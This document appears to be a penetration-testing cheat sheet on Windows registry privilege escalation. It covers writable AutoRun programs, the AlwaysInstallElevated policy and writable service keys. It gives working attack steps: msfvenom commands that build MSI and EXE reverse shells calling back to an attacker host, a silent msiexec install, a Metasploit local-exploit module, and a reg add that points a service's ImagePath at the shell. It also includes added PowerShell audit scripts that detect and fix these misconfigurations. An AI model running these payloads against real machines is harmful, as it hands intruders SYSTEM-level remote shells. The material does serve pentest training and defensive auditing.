# Registry

## AUTORUN:

Your enumeration scripts will give you a list of AutoRun programs (winPEAS shows them under "AutoRun applications"). Check whether your user has read/write access to those program files. If so, create a malicious executable for the AutoRun program and replace the original one with it. This requires the machine to be restarted before the AutoRun entry runs and gives you a shell, which means you only get a shell once the Administrator logs into their account: the administrator receives a prompt to run the program, and once they accept it you get a reverse shell.

## ALWAYS INSTALL ELEVATED:

Windows installs software from MSI packages (Windows Installer files). For this technique to work, the `AlwaysInstallElevated` policy must be enabled in two registry locations:

```bash
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
```

Check both keys: `AlwaysInstallElevated` must be set to 1 in both HKLM and HKCU, otherwise the MSI is not installed with elevated privileges.
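The check above, written as a PowerShell audit that reports the state of both hives and can switch the policy off. This is an added example for defenders, not code from the original page; the function names are this example's own, the registry paths are the ones the page queries, and the Group Policy location named in the comment is where the setting is normally managed.

```powershell
# Added audit example (not from the original page): report whether AlwaysInstallElevated
# is enabled in BOTH hives and, optionally, set it to 0. Function names are this example's own.

$InstallerPolicyPaths = @(
    'HKLM:\Software\Policies\Microsoft\Windows\Installer',
    'HKCU:\Software\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)][string]$Path)
    # A missing key or a missing value both mean "policy not set" -> $null.
    if (-not (Test-Path -Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name 'AlwaysInstallElevated' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    # The technique only works when the value is 1 under HKLM AND HKCU.
    $details = foreach ($p in $InstallerPolicyPaths) {
        [pscustomobject]@{ Path = $p; AlwaysInstallElevated = (Get-AlwaysInstallElevatedValue -Path $p) }
    }
    $enabledCount = @($details | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count
    $enabled = ($enabledCount -eq $InstallerPolicyPaths.Count)
    $verdict = if ($enabled) { 'VULNERABLE: any user can install an MSI with SYSTEM privileges' }
               else           { 'OK: AlwaysInstallElevated is not enabled in both hives' }
    [pscustomobject]@{ Details = $details; Enabled = $enabled; Verdict = $verdict }
}

function Disable-AlwaysInstallElevated {
    # Remediation: explicitly set the value to 0 in both hives (creating the key if needed).
    # Writing HKLM needs an elevated session. The durable fix is the Group Policy setting
    # "Always install with elevated privileges" (Computer/User Configuration > Administrative
    # Templates > Windows Components > Windows Installer), set to Disabled.
    foreach ($p in $InstallerPolicyPaths) {
        if (-not (Test-Path -Path $p)) { New-Item -Path $p -Force | Out-Null }
        Set-ItemProperty -Path $p -Name 'AlwaysInstallElevated' -Value 0 -Type DWord
    }
    Test-AlwaysInstallElevated
}

$status = Test-AlwaysInstallElevated
$status.Details | Format-Table -AutoSize
$status.Verdict
# To remediate after reviewing the output:  Disable-AlwaysInstallElevated
```

The HKCU value only covers the user running the script; when auditing a fleet, run the HKLM check as SYSTEM and evaluate the user half through the policy that applies to each account.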

#### METHOD 1:

Run PowerUp.ps1 and use the Abuse function to add a user or perform some other task

#### METHOD 2:

Create a metasploit reverse shell. Transfer it to the machine. Run it.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi
#Transfer it to the victim machine (here C:\Temp\shell.msi) and run:
msiexec /quiet /qn /i C:\Temp\shell.msi
```

#### METHOD 3:

```bash
#From an existing meterpreter session, send it to the background:
background
#Load the module
use exploit/windows/local/always_install_elevated
#Point it at the session you just backgrounded, then run it
set SESSION <session id>
run
```

## REGSVC:

winPEAS: **Looking if you can modify any service registry**

```bash
#Suppose that winPEAS reports the registry key:
HKLM\system\currentcontrolset\services\regsvc (Interactive [TakeOwnership])

#Verify the permissions of the service key
#CMD (accesschk and reg take the plain HKLM\ form; the HKLM:\ drive syntax is PowerShell-only)
accesschk /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

#POWERSHELL
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

#Check if we can start the service
accesschk /accepteula -ucqv user regsvc

#Query the service info
reg query HKLM\System\CurrentControlSet\Services\regsvc

#Create a reverse shell and transfer it to C:\Temp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f exe -o shell.exe

#Point the service binary at it
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

#Start a listener, then start the service
sc start regsvc
```
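The two weaknesses this page relies on (AutoRun binaries writable by ordinary users in the AUTORUN section, and service registry keys writable by ordinary users in this section) come down to the same question: does an Allow ACE grant a write-class right to a broad principal? The following PowerShell audit, added here as an example and not taken from the page or from winPEAS, answers it for both. The `$BroadPrincipals` list, the right masks and all function names are this example's own choices; the Run keys are the standard ones, the services path is the one queried above, and `NT AUTHORITY\INTERACTIVE` corresponds to the "Interactive" entry in the accesschk output.

```powershell
# Added audit example (not from the original page): flag AutoRun executables and service
# registry keys whose ACL lets broad, unprivileged principals modify them.

# Principals that should never hold write rights on these objects (English names assumed).
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Bit masks of "can change the object" rights; the GENERIC_WRITE/GENERIC_ALL bits are included
# because they survive unmapped on some inherited ACEs.
$FileWriteMask     = 0x500D0116  # WriteData|AppendData|WriteEA|WriteAttributes|Delete|ChangePermissions|TakeOwnership|generics
$RegistryWriteMask = 0x500D0006  # SetValue|CreateSubKey|Delete|ChangePermissions|TakeOwnership|generics

function Test-WeakAce {
    # Returns the Allow ACEs of $Acl that give one of $BroadPrincipals a right in $WriteMask.
    param(
        [Parameter(Mandatory)]$Acl,
        [Parameter(Mandatory)][string]$RightsProperty,   # 'FileSystemRights' or 'RegistryRights'
        [Parameter(Mandatory)][int]$WriteMask
    )
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # value__ is the raw enum bit mask, so generic bits are tested too.
        if (($ace.$RightsProperty.value__ -band $WriteMask) -ne 0) { $ace }
    }
}

$RunKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

function Get-CommandExecutable {
    # Extract the program path from a Run value such as '"C:\Program Files\App\app.exe" /silent'.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '^\s*"([^"]+)"')       { return $Matches[1] }   # quoted path
    if ($CommandLine -match '^\s*(.+?\.exe)(\s|$)') { return $Matches[1] }   # unquoted path, may contain spaces
    return ($CommandLine -split '\s+')[0]
}

function Get-WritableAutoRun {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $k = Get-Item -Path $key
        foreach ($name in $k.GetValueNames()) {
            $exe = [Environment]::ExpandEnvironmentVariables((Get-CommandExecutable -CommandLine ([string]$k.GetValue($name))))
            if (-not (Test-Path -LiteralPath $exe)) { continue }
            $weak = Test-WeakAce -Acl (Get-Acl -LiteralPath $exe) -RightsProperty 'FileSystemRights' -WriteMask $FileWriteMask
            if ($weak) {
                [pscustomobject]@{ Key = $key; Entry = $name; Executable = $exe
                                   GrantedTo = (@($weak | ForEach-Object { $_.IdentityReference.Value }) -join ', ') }
            }
        }
    }
}

function Get-WritableServiceKey {
    foreach ($svc in Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
        $acl = Get-Acl -Path $svc.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        $weak = Test-WeakAce -Acl $acl -RightsProperty 'RegistryRights' -WriteMask $RegistryWriteMask
        if ($weak) {
            [pscustomobject]@{ Service = $svc.PSChildName; ImagePath = $svc.GetValue('ImagePath')
                               GrantedTo = (@($weak | ForEach-Object { "$($_.IdentityReference.Value) [$($_.RegistryRights)]" }) -join '; ') }
        }
    }
}

'== AutoRun executables writable by unprivileged principals =='
Get-WritableAutoRun | Format-Table -AutoSize
'== Service registry keys writable by unprivileged principals =='
Get-WritableServiceKey | Format-Table -AutoSize
```

Run it from an elevated prompt so every service key is readable; a hit in the second list is exactly the condition the `reg add ... ImagePath` step above abuses, and the fix is to remove the offending ACE (or the whole inherited grant) so that only Administrators and SYSTEM can write the key. On a non-English system replace the principal names in `$BroadPrincipals` with their localized equivalents or compare SIDs instead.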

